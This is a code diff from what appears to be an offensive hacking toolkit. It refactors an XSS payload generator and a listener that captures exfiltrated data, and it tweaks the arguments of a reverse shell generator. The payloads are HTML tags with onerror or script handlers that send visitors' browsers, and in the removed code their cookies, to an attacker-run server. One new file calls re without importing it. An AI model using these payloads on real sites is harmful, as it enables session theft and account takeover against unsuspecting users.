xss handler, argparse

fileserver.py

@@ -5,12 +5,10 @@ from http.server import BaseHTTPRequestHandler, HTTPServer
 from urllib.parse import urlparse
 import threading
 import requests
-import sys
 import time
 import os
 import ssl
 import util
-import xss_handler
 
 class FileServerRequestHandler(BaseHTTPRequestHandler):
 
@@ -275,10 +273,6 @@ class HttpFileServer(HTTPServer):
             self.listen_thread.join()
 
 if __name__ == "__main__":
-    if len(sys.argv) < 2 or sys.argv[1] not in ["shell","dump","proxy","xss"]:
-        print("Usage: %s [shell,dump,proxy,xss]" % sys.argv[0])
-        exit(1)
-
     parser = argparse.ArgumentParser(description="Spawn a temporary http server")
     parser.add_argument(
         "action",
@@ -327,8 +321,11 @@ if __name__ == "__main__":
         file_server.forwardRequest("/proxy", url)
         print("Exfiltrate data using:", file_server.get_full_url("/proxy", ip_address))
     elif args.action  == "xss":
+        from xss_handler import generate_payload as generate_xss_payload
         payload_type = args.payload if args.payload else "img"
-        xss = xss_handler.generatePayload(payload_type, ip_addr, args.port)
+        xss = generate_xss_payload(payload_type, file_server.get_full_url("/exfiltrate", ip_address))
+        file_server.addFile("/xss", xss)
+        file_server.dumpRequest("/exfiltrate")
         print("Exfiltrate data using:")
         print(xss)
 

rev_shell.py

@@ -532,8 +532,8 @@ if __name__ == "__main__":
 
     parser = argparse.ArgumentParser(description="Reverse shell generator")
     parser.add_argument(dest="type", type=str, default=None, help="Payload type")
-    parser.add_argument("--port", type=int, required=False, default=None, help="Listening port")
-    parser.add_argument("--addr", type=str, required=False, default=util.get_address(), help="Listening address")
+    parser.add_argument("-p", "--port", type=int, required=False, default=None, help="Listening port")
+    parser.add_argument("-a", "--addr", type=str, required=False, default=util.get_address(), help="Listening address")
     args, extra = parser.parse_known_args()
 
     listen_port = args.port

xss_handler.py

@@ -1,108 +1,71 @@
 #!/usr/bin/env python
 
 from hackingscripts import util
-import sys
-import http.server
-import socketserver
-from http.server import HTTPServer, BaseHTTPRequestHandler
-
-# returns http address
-def getServerAddress(address, port):
-    if port == 80:
-        return "http://%s" % address
-    else:
-        return "http://%s:%d" % (address, port)
-
-# returns js code: 'http://xxxx:yy/?x='+document.cookie
-def getCookieAddress(address, port):
-    return "'%s/?x='+document.cookie" % getServerAddress(address, port)
-
-def generatePayload(type, address, port):
+from fileserver import HttpFileServer
+import argparse
+import random
 
+def generate_payload(payload_type, url, index=None, **kwargs):
     payloads = []
-    cookieAddress = getCookieAddress(address, port)
 
     media_tags = ["img","audio","video","image","body","script","object"]
-    if type in media_tags:
-        payloads.append('<%s src=1 href=1 onerror="javascript:document.location=%s">' % (type, cookieAddress))
+    if payload_type in media_tags:
+        payloads.append('<%s src=1 href=1 onerror="javascript:document.location=%s">' % (payload_type, url))
 
-    if type == "script":
-        payloads.append('<script type="text/javascript">document.location=%s</script>' % cookieAddress)
-        payloads.append('<script src="%s/xss" />' % getServerAddress(address, port))
+    if payload_type == "script":
+        payloads.append('<script type="text/javascript">document.location=%s</script>' % url)
+        payloads.append('<script src="%s/xss" />' % url)
 
     if len(payloads) == 0:
         return None
 
     return "\n".join(payloads)
 
-class XssServer(BaseHTTPRequestHandler):
-    def _set_headers(self):
-        self.send_response(200)
-        self.send_header("Content-type", "text/html")
-        self.end_headers()
-
-    def _html(self):
-        content = f"<html><body><h1>Got'cha</h1></body></html>"
-        return content.encode("utf8")  # NOTE: must return a bytes object!
-
-    def do_GET(self):
-        self._set_headers()
-        if self.path == "/xss":
-            cookie_addr = getCookieAddress(util.get_address(), listen_port)
-            self.wfile.write(cookie_addr.encode())
-        else:
-            self.wfile.write(self._html())
-
-    def do_HEAD(self):
-        self._set_headers()
-
-    def end_headers(self):
-        self.send_header('Access-Control-Allow-Origin', '*')
-        BaseHTTPRequestHandler.end_headers(self)
-
-    def do_OPTIONS(self):
-        self.send_response(200, "ok")
-        self.send_header('Access-Control-Allow-Origin', '*')
-        self.send_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')
-        # self.send_header("Access-Control-Allow-Headers", "X-Requested-With")
-        # self.send_header("Access-Control-Allow-Headers", "Content-Type")
-        self.end_headers()
-
-    def do_POST(self):
-        self._set_headers()
-        content_length = int(self.headers['Content-Length']) # <--- Gets the size of data
-        post_data = self.rfile.read(content_length)
-        print(post_data)
-        self.wfile.write(self._html())
-
 if __name__ == "__main__":
 
-    if len(sys.argv) < 2:
-        print("Usage: %s <type> [port]" % sys.argv[0])
-        exit(1)
+    parser = argparse.ArgumentParser(description="XSS payload generator")
+    parser.add_argument(dest="type", type=str, default=None, help="Payload type")
+    parser.add_argument("-p", "--port", type=int, required=False, default=None, help="Listening port")
+    parser.add_argument("-a", "--addr", type=str, required=False, default=util.get_address(), help="Listening address")
+    args, extra = parser.parse_known_args()
 
-    listen_port = None if len(sys.argv) < 3 else int(sys.argv[2])
-    payload_type = sys.argv[1].lower()
+    listen_port = args.port
+    payload_type = args.type.lower()
+    local_address = args.addr
+    extra_args = {}
 
-    local_address = util.get_address()
+    for entry in extra:
+        match = re.match(r"(\w+)=(\w+)", entry)
+        if not match:
+            print("Invalid extra argument:", entry)
+            exit()
+        key, value = match.groups()
+        extra_args[key] = value
 
     # choose random port
     if listen_port is None:
-        sock = util.open_server(local_address)
-        if not sock:
-            exit(1)
-        listen_port = sock.getsockname()[1]
-        sock.close()
+        listen_port = random.randint(10000,65535)
+        while util.is_port_in_use(listen_port):
+            listen_port = random.randint(10000,65535)
 
-    payload = generatePayload(payload_type, local_address, listen_port)
-    if not payload:
-        print("Unsupported payload type")
+    http_server = HttpFileServer(local_address, listen_port)
+    payload_type = args.type.lower()
+    url = http_server.get_full_url("/", util.get_address())
+    payload = generate_payload(payload_type, url, **extra_args)
+    if payload is None:
+        print("Unknown payload type: %s" % payload_type)
+        # print("Supported types: ")
         exit(1)
 
-    print("Payload:")
-    print(payload)
-    print()
+    print(f"---PAYLOAD---\n{payload}\n---PAYLOAD---\n")
 
-    httpd = HTTPServer((local_address, listen_port), XssServer)
-    print(f"Starting httpd server on {local_address}:{listen_port}")
-    httpd.serve_forever()
+    headers = {
+        "Access-Control-Allow-Origin": "*",
+        "Access-Control-Allow-Methods": "GET, POST, OPTIONS"
+    }
+
+    http_server.addRoute("/", lambda req: (201, b"", headers))
+    http_server.dumpRequest("/")
+    http_server.serve_forever()
+    
+